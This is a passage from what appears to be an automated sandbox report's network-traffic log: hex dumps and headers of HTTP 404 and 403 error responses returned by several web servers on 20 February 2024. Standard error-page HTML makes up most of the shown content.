3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Tue, 20 Feb 2024 23:26:08 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: oIAFe96U/MkF2Mc9jData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:08 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 21Connection: keep-aliveData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:08 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:08 GMTContent-Length: 13695Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Tue, 20 Feb 2024 23:26:09 GMTcontent-type: text/html; charset=iso-8859-1content-length: 196server: Apachex-iplb-request-id: BF60E3DE:DD2F_D5BA2104:0050_65D53511_286FC:41ABx-iplb-instance: 51919Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://wefttechnologies.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc b2 eb 76 dc c6 d5 2d fa 5b 7a 8a 12 72 b6 45 7e 21 d0 75 af 02 c5 96 b7 dd 76 3e 65 0f 2a c9 89 1c 66 6f 39 1e 1e 60 a3 ba 1b 36 1a e8 00 68 36 19 45 63 9c d7 38 af 77 9e e4 cc 2a a0 2f a4 28 89 b6 ec 24 4a cc c6 aa 75 99 73 cd 35 cf 9e c4 f1 59 eb a6 5d 51 57 64 5a 66 6d 3b 8e ae 0a b7 59 d5 4d 17 3d 8f e3 e7 8f cf 50 41 86 7f 67 79 71 45 8a 7c 1c b5 d3 a6 2e cb 78 5a 57 5d 56 54 ae 89 b6 bd ef 24 86 19 79 3d ed 6e 56 8e 2c ba 65 89 d8 ff 90 32 ab e6 e3 c8 55 f1 5f 5e 45 fe cd 65 f9 f3 c7 8f ce 96 ae cb c8 74 91 35 ad eb c6 d1 5f be f9 5d 6c a3 dd 7b 95 2d dd 01 43 e2 81 5c 85 ba 4d 91 77 8b 71 ee ae 8a a9 8b 43 70 42 8a aa e8 8a ac 8c db 69 56 ba 31 0b 53 ca a2 fa 91 34 ae 1c 47 ab a6 9e 15 a5 8b c8 a2 71 b3 71 b4 e8 ba 55 7b 3a 1a cd 97 ab 79 52 37 f3 d1 f5 ac 1a 31 df 14 36 0f e8 68 59 b9 a6 bb 19 47 f5 fc b4 ac fd d8 03 0a ae fa 1e 9b 90 d1 8e ec ad 72 bf fe 21 5f 77 d9 16 9d 3b 2c 0f bb 3d 6d ea cb ba 6b 9f ee 2a 9f 56 75 51 e5 ee fa 84 cc a0 6c bd 79 ea 3b d0 e2 cf f2 cd a2 68 89 1f 43 f0 5b af ba 62 59 fc c3 e5 64 53 74 0b d2 2d 1c f9 3f 75 d6 76 e4 d5 d7 7f 24 ab 72 3d 2f 2a 72 c5 59 62 49 4c b6 cb de f8 82 64 5a 2f 47 9b ba c9 57 8d 6b db 51 5f da 8e 5a 57 8f 88 bf de a3 b3 ae e8 4a f7 fc 4f d9 dc 91 aa ee 40 64 5d e5 98 f2 aa 9e 75 9b ac 71 e4 2b 77 e5 ca 7a b5 04 5f 32 a9 97 ab ac ba 21 ff 24 7f 75 b3 8e 7c e3 a6 8b aa 2e eb 79 e1 da b3 51 3f e8 5e 7d 7e aa 9c 7e d2 41 f5 27 93 7b 2f 92 d7 f7 7b 7f 9b 03 b4 9f 39 bc 9d 36 c5 aa 23 de 0a e3 28 5b ad ca 62 9a 75 45 5d 8d ca fc b7 3f b4 75 05 84 32 6b db 71 14 ee 02 df 2e dc 32 8b e7 4d b6 5a 44 cf df 44 ff 33 e0 5f 77 d1 e9 ce ad 7d 89 f7 6b 74 12 fd cf be f2 f4 5b 94 06 bb 9d 46 7f 75 97 af bc cd 90 2c f2 83 be 0d 18 76 07 04 83 07 7e b3 35 e5 49 b4 6e ca 8f 55 a3 2a a8 72 fa d3 d5 38 89 72 d7 6b 81 e5 31 e0 65 7d 59 94 8e 7c b1 5a dd 37 02 e5 ab da eb 5e 64 e5 17 d3 be e5 60 c5 57 2e 6b a6 8b 21 71 12 75 59 33 77 90 68 5f f0 75 d5 35 37 7f aa 8b aa eb 17 fb c6 2d 57 65 d6 b9 8f 2d f8 79 3b 7e d3 86 e1 df 77 ae 59 7e df 76 4d 51 cd df 46 6f 4f a2 bf af 5d 73 13 17 d5 6a ed 8f d1 b8 bf af 8b c6 e5 c4 eb 31 7e b7 25 7a fb dd 49 54 54 e7 59 35 5f c3 a6 e8 70 55 0c 6f bf fd ee ed d9 a8 d7 c1 bb e3 49 1c 93 11 f9 3f fe f4 e4 d5 d7 7f 24 ab 72 3d 2f aa 84 c4 f1 f3 c7 8f 1f 9f 95 45 f5 23 69 5c 09 e7 94 18 5e f9 0d ee b1 52 d3 b6 bf bd 5e 96 48 15 5d e9 7e ba 55 c9 67 4d f6 f7 75 fd 8c fc ce b9 3c 22 8b c6 cd c6 1f d6 69 86 c2 51 70 f8 bf 9c 23 6a 7c 6d fb 70 b2 d3 a1 e3 90 f5 f6 04 9b a2 ca eb 4d f2 fd 66 e5 96 f5 0f c5 2b d7 75 b8 5e 4b c6 e4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 63 68 6f 6e 6f 6e 6c 69 6e 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at archononline.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 20 Feb 2024 23:26:09 GMTServer: ApacheContent-Length: 268Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Tue, 20 Feb 2024 23:26:09 GMTContent-Length: 13697Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
